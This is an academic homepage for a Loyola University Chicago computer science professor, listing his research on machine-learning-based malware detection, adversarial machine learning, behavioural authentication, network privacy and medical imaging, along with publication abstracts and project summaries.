Mohammed Abuhamad

I am an assistant professor of Computer Science at Loyola University Chicago . I received a Ph.D. degree in Computer Science from the University of Central Florida (UCF) in 2020. I also received a Ph.D. degree in Electrical and Computer Engineering from INHA University , (Incheon, Republic of Korea) in 2020. I received a Master degree in Information Technology (Artificial Intelligence) from the National University of Malaysia , (Bangi, Malaysia) in 2013.

I am interested in AI/Deep-Learning-based Information Security, especially Software and Mobile/IoT Security. I am also interested in Machine Learning-based Applications and Adversarial Machine Learning. I have published several peer-reviewed research papers in top-tier conferences and journals such as ACM CCS, PoPETS, IEEE ICDCS, and IEEE IoT-J.

Research Lab: Cybersecurity lab and AI for Secure Computing Research Lab ( AISeC).
Teaching (Spring 2024): COMP 487: Deep Learning and COMP 458: Big Data Analytics.
Office Hours: Fridays 09:00 - 11:00 AM and Mondays 03:00 - 05:00 PM.

01

Information Security

We employ advances in machine learning to information and system security.

02

Software Security

We study methods for software authorship and vulnerabilities.

03

Privacy

Authorship anonymization and behavioral biometrics for authentication.

04

Robustness and Adversarial ML

We analyze the security proprieties of machine learning models

05

Applied Machine Learning

We study and employ machine learning in various domains.

06

Malware Analysis

We utilize various characterizing features to build machine learning models to detect and analyze malware.

Research

To improve our understanding of systems, and to guide security analytics towards secure systems design, I employ advances in deep machine learning to systems security. The emergence of such learning techniques promises various avenues for attribution in data-driven security analytics, and those techniques constitute the cornerstone of my current and future research interests. My current research contributions have been focused on creating efficient and accurate methods for software security, building, customizing, optimizing, and leveraging deep machine learning techniques for security and privacy.

Information Security

Machine Learning

Software and IoT Security

Data Intelligence

Research Interests

We work on developing methods and algorithms to understand information from different sources and with different formats.

Information Security and Privacy

Our research focuses on building, customizing, optimizing, and leveraging machine learning techniques for creating efficient and accurate methods for information security and privacy.

We employ advances in the machine learning field to improve our understanding of systems and to guide security analytics towards secure systems design.

Our research interests include exploring the application space of AI in various areas, such as medical data and social network analysis.

Publications

Traditional one-time authentication mechanisms cannot authenticate smartphone users’ identities throughout the session – the concept of using behavioral-based biometrics captured by the built-in motion sensors and touch data is a candidate to solve this issue. Many studies proposed solutions for behavioral-based continuous authentication; however, they are still far from practicality and generality for real-world usage. To date, no commercially deployed implicit user authentication scheme exists because most of those solutions were designed to improve detection accuracy without addressing real-world deployment requirements. To bridge this gap, we tackle the limitations of existing schemes and reach toward developing a more practical implicit authentication scheme, dubbed MotionID, based on a one-class detector using behavioral data from motion sensors when users touch their smartphones. Compared with previous studies, our work addresses the following challenges: 1) Global mobile average to dynamically adjust the sampling rate for sensors on any device and mitigate the impact of using sensors’ fixed sampling rate; 2) Over-all-apps to authenticate a user across all the mobile applications, not only on-specific application; 3) Single-device-evaluation to measure the performance with multiple users’ (i.e., genuine users and imposters) data collected from the same device; 4) Rapid authentication to quickly identify users’ identities using a few samples collected within short durations of touching (1–5 s) the device; 5) Unconditional settings to collect sensor data from real-world smartphone usage rather than a laboratory study. To show the feasibility of MotionID for those challenges, we evaluated the performance of MotionID with ten users’ motion sensor data on five different smartphones under various settings. Our results show the impracticality of using a fixed sampling rate across devices that most previous studies have adopted. MotionID is able to authenticate users with an F1-score up to 98.5% for some devices under practical requirements and an F1-score up to roughly 90% when considering the drift concept and rapid authentication settings. Finally, we investigate time efficiency, power consumption, and memory usage considerations to examine the practicality of MotionID.
Deep Learning (DL) is rapidly maturing to the point that it can be used in safety- and security-crucial applications, such as self-driving vehicles, surveillance, drones, and robots. However, adversarial samples, which are undetectable to the human eye, pose a serious threat that can cause the model to misbehave and compromise the performance of such applications. Addressing the robustness of DL models has become crucial to understanding and defending against adversarial attacks. In this study, we perform a series of experiments to examine the effect of adversarial attacks and defenses on various model architectures across well-known datasets. Our research focuses on black-box attacks such as SimBA, HopSkipJump, MGAAttack, and boundary attacks, as well as preprocessor-based defensive mechanisms, including bits squeezing, median smoothing, and JPEG filter. Experimenting with various models, our results demonstrate that the level of noise needed for the attack increases as the number of layers increases. Moreover, the attack success rate decreases as the number of layers increases. This indicates that model complexity and robustness have a significant relationship. Investigating the diversity and robustness relationship, our experiments with diverse models show that having a large number of parameters does not imply higher robustness. Our experiments extend to show the effects of the training dataset on model robustness. Using various datasets such as ImageNet-1000, CIFAR-100, and CIFAR-10 are used to evaluate the black-box attacks. Considering the multiple dimensions of our analysis, e.g., model complexity and training dataset, we examined the behavior of black-box attacks when models apply defenses. Our results show that applying defense strategies can significantly reduce attack effectiveness. This research provides in-depth analysis and insight into the robustness of DL models against various attacks, and defenses.
Rapid advancements of deep learning are accelerating adoption in a wide variety of applications, including safety-critical applications such as self-driving vehicles, drones, robots, and surveillance systems. These advancements include applying variations of sophisticated techniques that improve the performance of models. However, such models are not immune to adversarial manipulations, which can cause the system to misbehave and remain unnoticed by experts. The frequency of modifications to existing deep learning models necessitates thorough analysis to determine the impact on models' robustness. In this work, we present an experimental evaluation of the effects of model modifications on deep learning model robustness using adversarial attacks. Our methodology involves examining the robustness of variations of models against various adversarial attacks. By conducting our experiments, we aim to shed light on the critical issue of maintaining the reliability and safety of deep learning models in safety- and security-critical applications. Our results indicate the pressing demand for an in-depth assessment of the effects of model changes on the robustness of models.
Deep learning methods have gained increasing attention in various applications due to their outstanding performance. For exploring how this high performance relates to the proper use of data artifacts and the accurate problem formulation of a given task, interpretation models have become a crucial component in developing deep learning-based systems. Interpretation models enable the understanding of the inner workings of deep learning models and offer a sense of security in detecting the misuse of artifacts in the input data. Similar to prediction models, interpretation models are also susceptible to adversarial inputs. This work introduces two attacks, AdvEdg and AdvEdge+, which deceive both the target deep learning model and the coupled interpretation model. We assess the effectiveness of proposed attacks against four deep learning model architectures coupled with four interpretation models that represent different categories of interpretation models. Our experiments include the implementation of attacks using various attack frameworks. We also explore the attack resilience against three general defense mechanisms and potential countermeasures. Our analysis shows the effectiveness of our attacks in terms of deceiving the deep learning models and their interpreters, and highlights insights to improve and circumvent the attacks.
Both CT and MRI images are acquired for HDR prostate brachytherapy patients at our institution. CT is used to identify catheters and MRI is used to segment the prostate. To address scenarios of limited MRI access, we developed a novel Generative Adversarial Network (GAN) to generate synthetic MRI (sMRI) from CT with sufficient soft-tissue contrast to provide accurate prostate segmentation without MRI (rMRI).
Target and organ delineation during prostate high-dose-rate (HDR) brachytherapy treatment planning can be improved by acquiring both a postimplant CT and MRI. However, this leads to a longer treatment delivery workflow and may introduce uncertainties due to anatomical motion between scans. We investigated the dosimetric and workflow impact of MRI synthesized from CT for prostate HDR brachytherapy. Seventy-eight CT and T2-weighted MRI datasets from patients treated with prostate HDR brachytherapy at our institution were retrospectively collected to train and validate our deep-learning-based image-synthesis method. Synthetic MRI was assessed against real MRI using the dice similarity coefficient (DSC) between prostate contours drawn using both image sets. The DSC between the same observer's synthetic and real MRI prostate contours was compared with the DSC between two different observers’ real MRI prostate contours. New treatment plans were generated targeting the synthetic MRI-defined prostate and compared with the clinically delivered plans using target coverage and dose to critical organs. Variability between the same observer's prostate contours from synthetic and real MRI was not significantly different from the variability between different observer's prostate contours on real MRI. Synthetic MRI-planned target coverage was not significantly different from that of the clinically delivered plans. There were no increases above organ institutional dose constraints in the synthetic MRI plans.
With increased privacy concerns, anonymity tools such as VPNs and Tor have become popular. However, the packet metadata such as the packet size and number of packets can still be observed by an adversary. This is commonly known as fingerprinting and website fingerprinting attacks have received a lot of attention recently as a known victim's website visits can be accurately predicted, deanonymizing that victim's web usage. Most of the previous work have been performed in laboratory settings and have made two assumptions: 1) a victim visits one website at a time, and 2) the whole website visit with all the network packets can be observed. To validate these assumptions, a new private webbrowser extension called WebTracker is deployed with real users. WebTracker records the websites visited, when the website loading starts, and when the website loading finishes. Results show that users' browsing patterns are different than what was previously assumed. Users may browse the web in a way that acts as a countermeasure against website fingerprinting due to multiple websites overlapping and downloading at the same time. Over 15% of websites overlap with at least one other website and each overlap was 66 seconds. Moreover, each overlap happens roughly 9 seconds after the first website download has started. Thus, this reinforces some previous work that the beginning of a website is more important than the end for a website fingerprinting attack.
With the DNS traffic, an eavesdropper can easily identify websites that a user is visiting. In order to address this concern of web privacy, encryption is used by performing a DNS lookup over HTTPS. In this paper, we studied whether the encrypted DoH traffic could be exploited to identify websites that a user has visited. This is a different type of website fingerprinting by analyzing encrypted DNS network traffic rather than the network traffic between the client and the web server. DNS typically uses fewer network packets than a website download. Our model and algorithm can accurately predict one out of 10,000 websites with a 95% accuracy using the first 50 DoH packets. In the open-world environment with 100,000 websites, our model achieves an F1-score of 93%.
This paper analyzes the reaction of social network users in terms of different aspects including sentiment analysis, topic detection, emotions, and the geo-temporal characteristics of our dataset. We show that the dominant sentiment reactions on social media are neutral, while the most discussed topics by social network users are about health issues. This paper examines the countries that attracted a higher number of posts and reactions from people, as well as the distribution of health-related topics discussed in the most mentioned countries. We shed light on the temporal shift of topics over countries. Our results show that posts from the top-mentioned countries influence and attract more reactions worldwide than posts from other parts of the world.
We have developed a PixCycleGAN framework to generate sMRI from CT with enhanced soft-tissue contrast on the boundary of prostate for HDR treatment planning. For our study, the DSC and HD of the prostate contours on sMRI vs. rMRI agrees within IOV. In the future, we will evaluate dosimetric impact of using sMRI in prostate segmentation for HDR treatment planning.
This work proposed W-Net, a CNN-based architecture with a small number of layers, to accurately classify the five WBC types. We evaluated W-Net on a real-world large-scale dataset and addressed several challenges such as the transfer learning property and the class imbalance. W-Net achieved an average classification accuracy of 97%. We synthesized a dataset of new WBC image samples using DCGAN, which we released to the public for education and research purposes.
This research utilizes various characterizing features extracted from each malware using static and dynamic analysis to build seven machine learning models to detect and analyze packed windows malware. We use a large-scale dataset of over 107,000 samples covering unpacked and packed malware using ten different packers. We examined the performance of seven machine learning techniques using 50 dynamic and static features. Our results show that packed malware can circumvent detection when a single analysis is performed while applying both static and dynamic methods can help improve the detection accuracy around 2% to 3%.
Deep neural network models are susceptible to malicious manipulations even in the black-box settings. Providing explanations for DNN models offers a sense of security by human involvement, which reveals whether the sample is benign or adversarial even though previous studies achieved a high attack success rate. However, interpretable deep learning systems (IDLSes) are shown to be susceptible to adversarial manipulations in white-box settings. Attacking IDLSes in black-box settings is challenging and remains an open research domain. In this work, we propose a black-box version of the white-box AdvEdge approach against IDLSes, which is query-efficient and gradient-free without obtaining any knowledge of the target DNN model and its coupled interpreter. Our approach takes advantage of transfer-based and score-based techniques using the effective microbial genetic algorithm (MGA). We achieve a high attack success rate with a small number of queries and high similarity in interpretations between adversarial and benign samples.
The rapid pace of malware development and the widespread use of code obfuscation, polymorphism, and morphing techniques pose a considerable challenge to detecting and analyzing malware. Today, it is difficult for antivirus applications to use traditional signature-based detection methods to detect morphing malware. Thus, the emergence of structure graph-based detection methods has become a hope to solve this challenge. In this work, we propose a method for detecting malware using graphs’ spectral heat and wave signatures, which are efficient and size- and permutation-invariant. We extracted 250 and 1,000 heat and wave representations, and we trained and tested heat and wave representations on eight machine learning classifiers. We used a dataset of 37,537 unpacked Windows malware executables and extracted the control flow graph (CFG) of each Windows malware to obtain the spectral representations. Our experimental results showed that by using heat and wave spectral graph theory, the best malware analysis accuracy reached 95.9%.
There is an increasing demand for comprehensive and in-depth analysis of behaviors of various attacks and the possible defenses against common deep learning models under several adversarial scenarios. In this study, we conducted four separate investigations. First, we examine the relationship between the model’s complexity and its robustness against the studied attacks. Second, the connection between the performance and diversity of models is examined. Third, the first and second experiments were tested across different datasets to explore the impact of the dataset on the performance of the model. Four, throughout the defense strategies, the model behavior is extensively investigated.
In this article, we survey more than 140 recent behavioral biometric-based approaches for continuous user authentication, including motion-based methods (28 studies), gait-based methods (19 studies), keystroke dynamics-based methods (20 studies), touch gesture-based methods (29 studies), voice-based methods (16 studies), and multimodal-based methods (34 studies). The survey provides an overview of the current state-of-the-art approaches for continuous user authentication using behavioral biometrics captured by smartphones’ embedded sensors, including insights and open challenges for adoption, usability, and performance.
For high dose rate prostate (HDR) brachytherapy at our institution, both CT and MRI are acquired to identify catheters and delineate the prostate, respectively. We propose to build a deep-learning model to generate synthetic magnetic resonance imaging (sMRI) with enhanced soft-tissue contrast from computed tomography (CT) scans. sMRI would assist physicians to accurately delineate the prostate without needing to acquire additional planning MRI. 58 paired post-implant CT and T2-weighted MRI sets acquired on the same day for HDR prostate patients were retrospectively curated to train and validate the conditional Generative Adversarial Networks (cGAN) algorithm Pix2Pix to generate sMRI.
In this paper, we investigate the exposure of those users to inappropriate comments posted on YouTube videos targeting this demographic. We collected a large-scale dataset of approximately four million records and studied the presence of five age-inappropriate categories and the amount of exposure to each category. Using natural language processing and machine learning techniques, we constructed ensemble classifiers that achieved high accuracy in detecting inappropriate comments. Our results show a large percentage of worrisome comments with inappropriate content: we found 11% of the comments on children’s videos to be toxic, highlighting the importance of monitoring comments, particularly on children’s platforms.
In this work, we provide a first look at the tasks managed by shell commands in Linux-based IoT malware toward detection. We analyze malicious shell commands found in IoT malware and build a neural network-based model, ShellCore, to detect malicious shell commands. Namely, we collected a large data set of shell commands, including malicious commands extracted from 2891 IoT malware samples and benign commands collected from real-world network traffic analysis and volunteered data from Linux users. Using conventional machine and deep learning-based approaches trained with a term- and character-level features, ShellCore is shown to achieve an accuracy of more than 99% in detecting malicious shell commands and files (i.e., binaries).
This study proposes a malware detection system robust to adversarial attacks. We examine the performance of the state-of-the-art methods against adversarial IoT software crafted using the graph embedding and augmentation techniques; namely, we study the robustness of such methods against two black-box adversarial methods, GEA and SGEA, to generate Adversarial Examples (AEs) with reduced overhead, and keeping their practicality intact. Our comprehensive experimentation with GEA-based AEs show the relation between misclassification and the graph size of the injected sample. Upon optimization and with small perturbation, by use of SGEA, all IoT malware samples are misclassified as benign. This highlights the vulnerability of current detection systems under adversarial settings. With the landscape of possible adversarial attacks, we then propose DL-FHMC, a fine-grained hierarchical learning approach for malware detection and classification, that is robust to AEs with a capability to detect 88.52% of the malicious AEs.
This work proposes a deep Learning-based approach for software authorship attribution, that facilitates large-scale, format-independent, language-oblivious, and obfuscation-resilient software authorship identification. This proposed approach incorporates the process of learning deep authorship attribution using a recurrent neural network, and ensemble random forest classifier for scalability to de-anonymize programmers.
Utilizing interpretation models enables a better understanding of how DNN models work, and offers a sense of security. However, interpretations are also vulnerable to malicious manipulation. We present AdvEdge and AdvEdge+, two attacks to mislead the target DNNs and deceive their combined interpretation models. We evaluate the proposed attacks against two DNN model architectures coupled with four representatives of different categories of interpretation models. The experimental results demonstrate our attacks’ effectiveness in deceiving the DNN models and their interpreters.
Machine Learning (ML) based Network Intrusion Systems (NIDSs) operate on flow features which are obtained from flow exporting protocols (i.e., NetFlow). Recent success of ML and Deep Learning (DL) based NIDS solutions assume such flow information (e.g., avg. packet size) is obtained from all packets of the flow. However, often in practice flow exporter is deployed on commodity devices where packet sampling is inevitable. As a result, applicability of such ML based NIDS solutions in the presence of sampling (i.e., when flow information is obtained from sampled set of packets instead of full traffic) is an open question. In this study, we explore the impact of packet sampling on the performance and efficiency of ML-based NIDSs. Unlike previous work, our proposed evaluation procedure is immune to different settings of flow export stage. Hence, it can provide a robust evaluation of NIDS even in the presence of sampling. Through sampling experiments we established that malicious flows with shorter size (i.e., number of packets) are likely to go unnoticed even with mild sampling rates such as 1/10 and 1/100. Next, using the proposed evaluation procedure we investigated the impact of various sampling techniques on NIDS detection rate and false alarm rate. Detection rate and false alarm rate is computed for three sampling rates (i.e., 1/10, 1/100, 1/1000), for four different sampling techniques and for three (two tree-based, one deep learning based) classifiers. Experimental results show that systematic linear sampler - SketFlow performs better compared to non-linear samplers such as Sketch Guided and Fast Filtered sampling. We also found that random forest classifier with SketchFlow sampling was a better combination. The combination showed higher detection rate and lower false alarm rate across multiple sampling rates compared to other sampler-classifier combinations. Our results are consistent in multiple sampling rates, exceptional case is observed for Sketch Guided Samp...
In this article, we propose AUToSen, a deep-learning-based active authentication approach that exploits sensors in consumer-grade smartphones to authenticate a user. Unlike conventional approaches, AUToSen is based on deep learning to identify user distinct behavior from the embedded sensors with and without the user's interaction with the smartphone. We investigate different deep learning architectures in modeling and capturing users' behavioral patterns for the purpose of authentication. Moreover, we explore the sufficiency of sensory data required to accurately authenticate users. We evaluate AUToSen on a real-world data set that includes sensors data of 84 participants' smartphones collected using our designed data-collection application.
In this paper, we systematically tackle the problem of adversarial examples detection in the control flow graph (CFG) based classifiers for malware detection using Soteria. Unique to Soteria, we use both density-based and level-based labels for CFG labeling to yield a consistent representation, a random walk-based traversal approach for feature extraction, and n-gram based module for feature representation. End-to-end, Soteria's representation ensures a simple yet powerful randomization property of the used classification features, making it difficult even for a powerful adversary to launch a successful attack. Soteria also employs a deep learning approach, consisting of an auto-encoder for detecting adversarial examples, and a CNN architecture for detecting and classifying malware samples.
Most authorship identification schemes assume that code samples are written by a single author. However, real software projects are typically the result of a team effort, making it essential to consider a fine-grained multi-author identification in a single code sample, which we address with Multi-χ. Multi-χ leverages a deep learning-based approach for multi-author identification in source code, is lightweight, uses a compact representation for efficiency, and does not require any code parsing, syntax tree extraction, nor feature selection.
In this work, we explore the ecosystem of proxies by understanding their affinities and distributions comparatively. We compare residential and open proxies in various ways, including country-level and city-level analyses to highlight their geospatial distributions, similarities, and differences against a large number of blacklists and categories therein, i.e., spam and maliciousness analysis, to understand their characteristics and attributes.
In this study, we investigate the correlation of different toxic behaviors such as identity hate, and obscenity with different news topics. To do that, we collected a large-scale dataset of approximately 7.3 million comments and more than 10,000 news video captions, utilized deep learning-based techniques to construct an ensemble of classifiers tested on a manually-labeled dataset for label prediction, achieved high accuracy, uncovered a large number of toxic comments on news videos across 15 topics obtained using Latent Dirichlet Allocation (LDA) over the captions of the news videos. Our analysis shows that religion and crime-related news have the highest rate of toxic comments, while economy-related news has the lowest rate. We highlight the necessity of effective tools to address topic-driven toxicity impacting interactions and public discourse on the platform.
This work aims to model seven Spatio-temporal behavioral characteristics of DDoS attacks, including the attack magnitude, the adversaries’ botnet information, and the attack’s source locality down to the organization. We leverage four state-of-the-art deep learning methods to construct an ensemble of models to capture and predict behavioral patterns of the attack. The proposed ensemble operates in two frequencies, hourly and daily, to actively model and predict the attack behavior and involvement, and oversee the effect of implementing a defense mechanism.
In this study, we focus on understanding the shift in the behavior of Twitter users, a major social media platform used by millions daily to share thoughts and discussions. In particular, we collected 26 million tweets for a period of seven months, three months before the pandemic outbreak, and four months after. Using topic modeling and state-of-the-art deep learning techniques, the trending topics within the tweets on monthly-bases, including their sentiment and user’s perception, were analyzed. This study highlights the change of the public behavior and concerns during the pandemic. Users expressed their concerns on health services, with an increase of 59.24% in engagement, and economical effects of the pandemic (34.43% increase). Topics such as online shopping have had a remarkable increase in popularity, perhaps due to the social distancing, while crime and sports topics witnessed a decrease.
This work proposes a convolutional neural network (CNN) based code authorship identification system. Our proposed system exploits term frequency-inverse document frequency, word embedding modeling, and feature learning techniques for code representation. This representation is then fed into a CNN-based code authorship identification model to identify the code’s author.
The purpose of this research is to introduce language model adaptation approach that combines both categories (data selection and weighting criterion) of language model adaptation. This approach applies data selection for specific-task translations by dividing the corpus into smaller and topic-related corpora using clustering process. We investigate the effect of different approaches for clustering the bilingual data on the language model adaptation process in terms of translation quality using the Europarl corpus WMT07 that includes bilingual data for English-Spanish, English-German and English-French.
In this study, we investigate the robustness of such models against adversarial attacks. Our approach crafts the adversarial IoT software using the Subgraph Embedding and Augmentation (SGEA) method that reduces the embedded size required to cause misclassification. Intensive experiments are conducted to evaluate the performance of the proposed method. We observed that SGEA approach is able to misclassify all IoT malware samples as benign by embedding an average size of 6.8 nodes. This highlights that the current detection systems are prone to adversarial examples attacks; thus, there is a need to build more robust systems to detect such manipulated features generated by adversarial examples.
This work proposes W-Net, a CNN-based method for WBC classification. We evaluate W-Net on a real-world large-scale dataset, obtained from The Catholic University of Korea, that includes 6,562 real images of the five WBC types. W-Net achieves an average accuracy of 97%.
This work proposes a Deep Learning-based Code Authorship Identification System (DL-CAIS) for code authorship attribution that facilitates large-scale, language-oblivious, and obfuscation-resilient code authorship identification. The deep learning architecture adopted in this work includes TF-IDF-based deep representation using multiple Recurrent Neural Network (RNN) layers and fully-connected layers dedicated to authorship attribution learning. The deep representation then feeds into a random forest classifier for scalability to de-anonymize the author. Comprehensive experiments are conducted to evaluate DL-CAIS over the entire Google Code Jam (GCJ) dataset across all years (from 2008 to 2016) and over real-world code samples from 1987 public repositories on GitHub.
This work proposes a Deep Learning-based Code Authorship Identification System (DL-CAIS) for code authorship attribution that facilitates large-scale, language-oblivious, and obfuscation-resilient code authorship identification. The deep learning architecture adopted in this work includes TF-IDF-based deep representation using multiple Recurrent Neural Network (RNN) layers and fully-connected layers dedicated to authorship attribution learning. The deep representation then feeds into a random forest classifier for scalability to de-anonymize the author. Comprehensive experiments are conducted to evaluate DL-CAIS over the entire Google Code Jam (GCJ) dataset across all years (from 2008 to 2016) and over real-world code samples from 1987 public repositories on GitHub.

Research Projects

Robustness and Adversarial Machine Learning

Deep Neural Networks have achieved state-of-the-art performance in various applications. It is crucial to verify that the high accuracy prediction for a given task is derived from the correct problem representation and not from the misuse of artifacts in the data. Investigating the security proprieties of machine learning models, recent studies have shown various categories of adversarial attacks such as model leakage, data membership inference, model confidence reduction, evasion, and poisoning attacks. We believe it is important to investigate and understand the implications of such attacks on sensitive applications in the field of information security and privacy.

DL-FHMC: Robust classification AdvEdge: AML against IDLSes SGEA: AML against malware detectors Soteria: Robust malware detectors Black-box and Target-specific AML BExploration of Black-box AML

Malware Analysis

Malware is one of the serious computer security threats. To protect computers from infection, accurate detection of malware is essential. At the same time, malware detection faces two main practical challenges: the speed of malware development and their distribution continues to increase with complex methods to evade detection (such as a metamorphic or polymorphic malware). This project utilizes various characterizing features extracted from each malware using static and dynamic analysis to build seven machine learning models to detect and analyze malware. We investigate the robustness of such machine learning models against adversarial attacks.

MLxPack DL-FHMC: Robust malware classification SGEA: AML against malware detectors Soteria: Robust malware detectors Spectral Representations of CFG ShellCore

Continuous User Authentication

Smartphones have become crucial for our daily life activities and are increasingly loaded with our personal information to perform several sensitive tasks, including mobile banking, communication, and storing private photos and files. Therefore, there is a high demand for applying usable continuous authentication techniques that prevent unauthorized access. We work on a deep learning-based active authentication approach that exploits sensors in consumer-grade smartphones to authenticate a user. We addressed various aspects regarding accuracy, efficiency, and usability.


AUToSen: Continuous Authentication Contemporary Survey on Sensor-Based Continuous Authentication

Machine Learning for Social Good

Computer-aided methods for analyzing white blood cells (WBC) are popular due to the complexity of the manual alternatives. We work on building a deep learning-based method for WBC classification. We proposed W-Net that we evaluated on a real-world large-scale dataset that includes 6,562 real images of the five WBC types. The dataset was provided by The Catholic University of Korea (The CUK), and approved by the Institutional Review Board (IRB) of The CUK. For further benefits, we generate synthetic WBC images using Generative Adversarial Network to be used for education and research purposes through sharing.

W-Net: WBC Classification Online Toxicity in Users Interactions with Mainstream Media Children Exposure to Inappropriate Comments in YouTube Synthetic MRI from CT Sentiment analysis of Users' Reactions on Social Media

Machine Learning for Medical Images

This project is about synthesizing magnetic resonance images (MRI) from computed tomography (CT) simulation scans using deep-learning models for high-dose-rate prostate brachytherapy. For high dose rate prostate brachytherapy, both CT and MRI are acquired to identify catheters and delineate the prostate, respectively. We propose to build a deep-learning model to generate synthetic MRI (sMRI) with enhanced soft-tissue contrast from CT scans. sMRI would assist physicians to accurately delineate the prostate without needing to acquire additional planning MRI.

W-Net: WBC Classification Synthetic MRI from CT

Network Security and Online Privacy

Network monitoring applications such as flow analysis, intrusion detection, and performance monitoring have become increasingly popular owing to the continuous increase in the speed and volume of network traffic. We work on investigating the feasibility of an in-network intrusion detection system that leverages the computation capabilities of commodity switches to facilitate fast and real-time response. Moreover, we explore the traffic sampling techniques that preserve flows’ behavior to apply intelligence in network monitoring and management. We also address the increased privacy concerns regarding website fingerprinting attacks despite the popular anonymity tools such as Tor and VPNs.

Traffic Sampling for NIDSs Multi-X Exploring the Proxy Ecosystem Studying the DDoS Attacks Progression

Sponsors

Contact Us

Our Address

308 Doyle Center, Lake Shore Campus
1052 W Loyola Ave. Chicago, IL 60626

Call Us

+1 773 508 3557